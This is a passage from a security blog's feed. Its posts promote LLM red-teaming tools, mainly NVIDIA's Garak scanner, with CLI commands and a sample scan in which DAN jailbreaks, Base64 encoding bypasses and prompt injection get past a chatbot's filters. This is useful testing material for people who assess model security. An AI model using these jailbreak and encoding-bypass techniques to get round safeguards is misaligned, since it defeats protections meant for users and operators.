logs get ignored. Security findings rendered in a color-coded dashboard with OWASP mappings get fixed.</p><p>And every finding has a timestamp, a conversation transcript, and a grader explanation. That&#8217;s your bounty submission evidence. That&#8217;s your compliance audit trail. That&#8217;s the artifact your CISO shows the board when they ask &#8220;how do we know our AI is secure?&#8221;</p><blockquote><p>We dropped the free chapters. Now breach the wall for the dead-simple step-by-step kill switch that shuts this all down.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/promptfoo-red-teaming">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Garak Vulnerability Scanner: Nessus for LLMs]]></title><description><![CDATA[Point it at a model. Pick your probes. Watch every guardrail break in JSONL.]]></description><link>https://www.toxsec.com/p/garak-llm-vulnerability-scanner</link><guid isPermaLink="false">https://www.toxsec.com/p/garak-llm-vulnerability-scanner</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Wed, 06 May 2026 13:31:30 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!wOGj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!wOGj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!wOGj!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!wOGj!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!wOGj!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!wOGj!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!wOGj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7298228,&quot;alt&quot;:&quot;Garak NVIDIA LLM vulnerability scanner tutorial showing probes detectors generators and CLI output for AI security testing and bug bounty.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694931?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a127658-a233-48ce-8017-a46617c303ab_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Garak NVIDIA LLM vulnerability scanner tutorial showing probes detectors generators and CLI output for AI security testing and bug bounty." title="Garak NVIDIA LLM vulnerability scanner tutorial showing probes detectors generators and CLI output for AI security testing and bug bounty." srcset="https://substackcdn.com/image/fetch/$s_!wOGj!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!wOGj!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!wOGj!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!wOGj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"></div></div></a></figure></div><p><strong>TL;DR:</strong> Garak is NVIDIA&#8217;s open-source LLM vulnerability scanner. Point it at a model, pick your probes, and it fires hundreds of known attack patterns across prompt injection, jailbreaks, encoding bypasses, data leakage, and toxicity. CLI-first, plugin-based, fast. Your model just failed 47 probes across six categories. Now what?</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h3>What Is Garak and Why You Run It First</h3><p>Nobody ships a web app without running a vulnerability scanner against it first. Nikto, Nessus, nuclei. Pick your poison, point it at the target, let it rip through known attack patterns, then read the report. LLMs ship without this step every single day.</p><p>Garak fixes that. The Generative AI Red-teaming and Assessment Kit is <a href="https://github.com/NVIDIA/garak">NVIDIA&#8217;s open-source LLM vulnerability scanner</a>, built by their AI Red Team and backed by a research paper, 7.5k GitHub stars, and an active Discord. The latest stable release is v0.14.1, shipped April 2026, so the project is actively maintained and shipping. The tool probes your model&#8217;s defenses while looking completely benign.</p><p>The workflow is simple. Install. Point it at a model. Pick probes (or let it pick all of them). Garak fires every probe, runs each prompt multiple times to account for the model&#8217;s stochastic output, scores responses through detectors, and writes a structured JSONL report. One command, hundreds of attack vectors, a complete audit trail.</p><p>Garak covers the attack categories that matter: prompt injection, <a href="https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass">DAN-family jailbreaks</a>, encoding-based guardrail bypasses, data leakage, package hallucination (the <a href="https://www.toxsec.com/p/what-is-slopsquatting-ai-hallucinations">slopsquatting</a> vector), toxicity generation, malware generation attempts, cross-site scripting through LLM output, hallucination, and <a href="https://www.toxsec.com/p/token-level-ai-security-the-opus">glitch token exploitation</a>. 37+ probe modules, each containing multiple individual probes. The dan module alone ships with about fifteen scannable variants spanning DAN 6.0 through 11.0, plus STAN, DUDE, AntiDAN, and ChatGPT Developer Mode. The encoding module covers Base64, Base16, Base32, ROT13, Morse, Braille, ASCII85, hex, and more.</p><p>Think of Garak as Nessus before the pentest. We&#8217;re mapping the attack surface. Which probes get through. Which get blocked. Where the filters are soft. That scan data tells us where to aim our manual prompt injection chains. And once Garak flags the broken families, <a href="https://www.toxsec.com/p/pyrit-ai-red-teaming">PyRIT picks up the deep, adaptive multi-turn follow-up</a>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!vfcu!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd57f29ce-9701-49b8-bad5-2bbac4d00524_2326x1756.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!vfcu!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd57f29ce-9701-49b8-bad5-2bbac4d00524_2326x1756.png 424w, https://substackcdn.com/image/fetch/$s_!vfcu!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd57f29ce-9701-49b8-bad5-2bbac4d00524_2326x1756.png 848w, https://substackcdn.com/image/fetch/$s_!vfcu!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd57f29ce-9701-49b8-bad5-2bbac4d00524_2326x1756.png 1272w, https://substackcdn.com/image/fetch/$s_!vfcu!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd57f29ce-9701-49b8-bad5-2bbac4d00524_2326x1756.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!vfcu!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd57f29ce-9701-49b8-bad5-2bbac4d00524_2326x1756.png" width="2326" height="1756" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d57f29ce-9701-49b8-bad5-2bbac4d00524_2326x1756.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1756,&quot;width&quot;:2326,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:264813,&quot;alt&quot;:&quot;Toxsec.com Garak Vulnerability Scanner.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694931?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9b4ea58f-b8ea-48a6-9043-0d5a644dfb24_2326x2049.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Toxsec.com Garak Vulnerability Scanner." title="Toxsec.com Garak Vulnerability Scanner." srcset="https://substackcdn.com/image/fetch/$s_!vfcu!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd57f29ce-9701-49b8-bad5-2bbac4d00524_2326x1756.png 424w, https://substackcdn.com/image/fetch/$s_!vfcu!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd57f29ce-9701-49b8-bad5-2bbac4d00524_2326x1756.png 848w, https://substackcdn.com/image/fetch/$s_!vfcu!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd57f29ce-9701-49b8-bad5-2bbac4d00524_2326x1756.png 1272w, https://substackcdn.com/image/fetch/$s_!vfcu!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd57f29ce-9701-49b8-bad5-2bbac4d00524_2326x1756.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"></div></div></a></figure></div><h3>Generators, Probes, and Detectors: The Three Moving Parts</h3><p>Garak&#8217;s architecture has three components that matter.</p><p><strong>Generators</strong> are our connection to the target. OpenAI API, Hugging Face (pipeline and inference), AWS Bedrock, Cohere, Groq, Mistral, Ollama for local models, NVIDIA NIM endpoints, Replicate, LiteLLM, and custom REST APIs. If the model accepts text over an API, Garak can hit it.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;97b97e50-ffe5-4fa1-8e60-feb92943db67&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash"># Scan an OpenAI model for encoding-based injection
export OPENAI_API_KEY="sk-[REDACTED]"
python3 -m garak --target_type openai --target_name gpt-5-nano --probes encoding

# Scan a local Ollama model for DAN jailbreaks
python3 -m garak --target_type ollama --target_name llama3 --probes dan

# Scan a Hugging Face model for everything
python3 -m garak --target_type huggingface --target_name meta-llama/Llama-3-8b --probes all</code></pre></div><p><strong>Probes</strong> generate the attack payloads. Each probe module targets a specific vulnerability class and contains multiple individual prompts. Garak sends each prompt to the model ten times by default. Ten generations per prompt. That repetition matters because LLM output is non-deterministic. A model that refuses a jailbreak nine times out of ten still has a 10% bypass rate, and that 10% is a finding worth documenting.</p><p>The probe taxonomy maps directly to known vulnerability classes. promptinject implements the Agency Enterprise PromptInject framework for hijacking attacks. dan runs the full DAN family. encoding tests whether the same encoding stacks we use manually scale up to automation. leakreplay and knownbadsignatures check for training data extraction and malware signature generation. packagehallucination tests whether the model invents package names that don&#8217;t exist on PyPI or npm.</p><p><strong>Detectors</strong> evaluate the output. Simple string matching for known bad signatures. Classifier-based detection using small models for toxicity scoring. LLM-as-judge for nuanced cases. Each probe ships with a primary detector and optional extended detectors. A probe fires, the model responds, the detector scores pass or fail, and the result hits the JSONL log.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sSq-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sSq-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 424w, https://substackcdn.com/image/fetch/$s_!sSq-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 848w, https://substackcdn.com/image/fetch/$s_!sSq-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 1272w, https://substackcdn.com/image/fetch/$s_!sSq-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sSq-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png" width="1083" height="926" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:926,&quot;width&quot;:1083,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:125166,&quot;alt&quot;:&quot;Garak Scan: CLI Output: Garak LLM vulnerability scanner CLI output showing dan, encoding, promptinject, and leakreplay probe modules with progress bars and pass-fail rates against an OpenAI gpt-5-nano target.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694931?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Garak Scan: CLI Output: Garak LLM vulnerability scanner CLI output showing dan, encoding, promptinject, and leakreplay probe modules with progress bars and pass-fail rates against an OpenAI gpt-5-nano target." title="Garak Scan: CLI Output: Garak LLM vulnerability scanner CLI output showing dan, encoding, promptinject, and leakreplay probe modules with progress bars and pass-fail rates against an OpenAI gpt-5-nano target." srcset="https://substackcdn.com/image/fetch/$s_!sSq-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 424w, https://substackcdn.com/image/fetch/$s_!sSq-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 848w, https://substackcdn.com/image/fetch/$s_!sSq-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 1272w, https://substackcdn.com/image/fetch/$s_!sSq-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"></div></div></a></figure></div><h3>The Garak Scan That Matters</h3><p>Here&#8217;s what a real Garak scan surfaces. Point it at your production chatbot endpoint. Pick a handful of probe modules: dan, encoding, promptinject, leakreplay. Run it. Maybe twenty minutes depending on rate limits.</p><p>The report comes back. Your model held against DAN 6.0 through 9.0. Good. But DAN 11.0 and Developer Mode v2 both scored failures. The encoding module found that Base64-encoded prompts bypass your input filter entirely: 80% failure rate across ten generations. promptinject hijacking probes landed at 30%. leakreplay found the model regurgitating training data snippets when prompted with specific continuation patterns.</p><p>Four vulnerability classes confirmed in one scan. Base64 bypass alone maps to LLM01:2025 in the <a href="https://www.toxsec.com/p/owasp-top-10-for-genai">OWASP Top 10 for LLMs</a>, the top-ranked vulnerability. The DAN failures map to LLM01 too. The training data leakage maps to LLM02:2025 (Sensitive Information Disclosure), and a packagehallucination hit would map to LLM03:2025 (Supply Chain). Each finding has a full JSONL trail: exact prompts sent, exact responses received, detector verdicts, timestamps.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_ZYo!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_ZYo!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 424w, https://substackcdn.com/image/fetch/$s_!_ZYo!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 848w, https://substackcdn.com/image/fetch/$s_!_ZYo!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 1272w, https://substackcdn.com/image/fetch/$s_!_ZYo!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_ZYo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png" width="1099" height="989" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:989,&quot;width&quot;:1099,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:74253,&quot;alt&quot;:&quot;Garak Scan: JSONL Hit: Garak LLM vulnerability scanner JSONL hit log entry showing a single encoding.InjectBase64 prompt injection attempt with redacted payload, detector verdict, and timestamp evidence chain for bug bounty reproduction.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694931?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Garak Scan: JSONL Hit: Garak LLM vulnerability scanner JSONL hit log entry showing a single encoding.InjectBase64 prompt injection attempt with redacted payload, detector verdict, and timestamp evidence chain for bug bounty reproduction." title="Garak Scan: JSONL Hit: Garak LLM vulnerability scanner JSONL hit log entry showing a single encoding.InjectBase64 prompt injection attempt with redacted payload, detector verdict, and timestamp evidence chain for bug bounty reproduction." srcset="https://substackcdn.com/image/fetch/$s_!_ZYo!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 424w, https://substackcdn.com/image/fetch/$s_!_ZYo!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 848w, https://substackcdn.com/image/fetch/$s_!_ZYo!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 1272w, https://substackcdn.com/image/fetch/$s_!_ZYo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"></div></div></a></figure></div><p>This is the part that should bother you. One command. Garak does the rest. Every model deployed without running this scan has the same holes.</p><blockquote><p>We dropped the free chapters. Now breach the wall for the dead-simple step-by-step kill switch that shuts this all down.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/garak-llm-vulnerability-scanner">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[PyRIT AI Red Teaming: Metasploit for LLMs]]></title><description><![CDATA[Microsoft&#8217;s AI red team framework breaks down targets, converters, scorers, and orchestrators for bug bounty work.]]></description><link>https://www.toxsec.com/p/pyrit-ai-red-teaming</link><guid isPermaLink="false">https://www.toxsec.com/p/pyrit-ai-red-teaming</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Sun, 03 May 2026 14:31:20 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!x_Ph!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!x_Ph!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!x_Ph!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!x_Ph!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!x_Ph!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!x_Ph!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!x_Ph!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:6990692,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694979?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F26d96c1b-f7c0-4391-be03-2cad7fde8390_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!x_Ph!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!x_Ph!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!x_Ph!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 1272w, 